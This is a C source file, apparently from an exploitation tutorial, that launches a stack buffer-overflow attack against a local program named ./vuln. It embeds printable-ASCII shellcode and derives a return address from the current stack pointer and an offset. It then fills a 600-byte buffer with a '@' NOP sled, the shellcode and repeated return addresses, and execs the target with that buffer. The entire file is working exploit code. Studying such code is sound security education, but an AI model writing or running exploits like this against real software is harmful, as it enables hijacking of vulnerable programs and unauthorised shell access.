#include <stdlib.h>

char shellcode[] =
"%JONE%501:TX-3399-Purr-!TTTP\\%JONE%501:-tKK4-gXn%-uPy%P-8Jxn-%8sxP-dddd-777j-JdbyP-Uu%U-pp6A-At%RP-wwww-OO33-s9DVP-r%O%-wDee-yDmuP-CCCC-%0w%-42e6P-H8z8-Y8q8P-jj4j-d9L%-2658PPPPPPPPPPPPPPPP";

unsigned long sp(void)         // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer

int main(int argc, char *argv[])
{
  int i, offset;
  long esp, ret, *addr_ptr;
  char *buffer, *ptr;

  if(argc < 2)  // If no offset if given on commandline
  {             // Print a usage message
    printf("Use %s <offset>\nUsing default offset of 0\n",argv[0]);
    offset = 0; // and set a default offset of 0.
  }
  else          // Otherwise, use the offset given on commandline
  {
    offset = atoi(argv[1]); // offset = offset given on commandline
  }

  esp = sp();                 // Put the current stack pointer into esp
  ret = esp - offset;         // We want to overwrite the ret address

  printf("Stack pointer (EIP) : 0x%x\n", esp);
  printf("    Offset from EIP : 0x%x\n", offset);
  printf("Desired Return Addr : 0x%x\n", ret);

// Allocate 600 bytes for buffer (on the heap)
  buffer = malloc(600);

// Fill the entire buffer with the desired ret address
  ptr = buffer;
  addr_ptr = (long *) ptr;
  for(i=0; i < 600; i+=4)
  { *(addr_ptr++) = ret; }

// Fill the first 200 bytes of the buffer with "NOP" instructions
  for(i=0; i < 200; i++)
  { buffer[i] = '@'; } // Use a printable single-byte instruction

// Put the shellcode after the NOP sled
  ptr = buffer + 200 - 1;
  for(i=0; i < strlen(shellcode); i++)
  { *(ptr++) = shellcode[i]; }

// End the string
  buffer[600-1] = 0;

// Now call the program ./vuln with our crafted buffer as its argument
  execl("./vuln", "vuln", buffer, 0);

  return 0;
}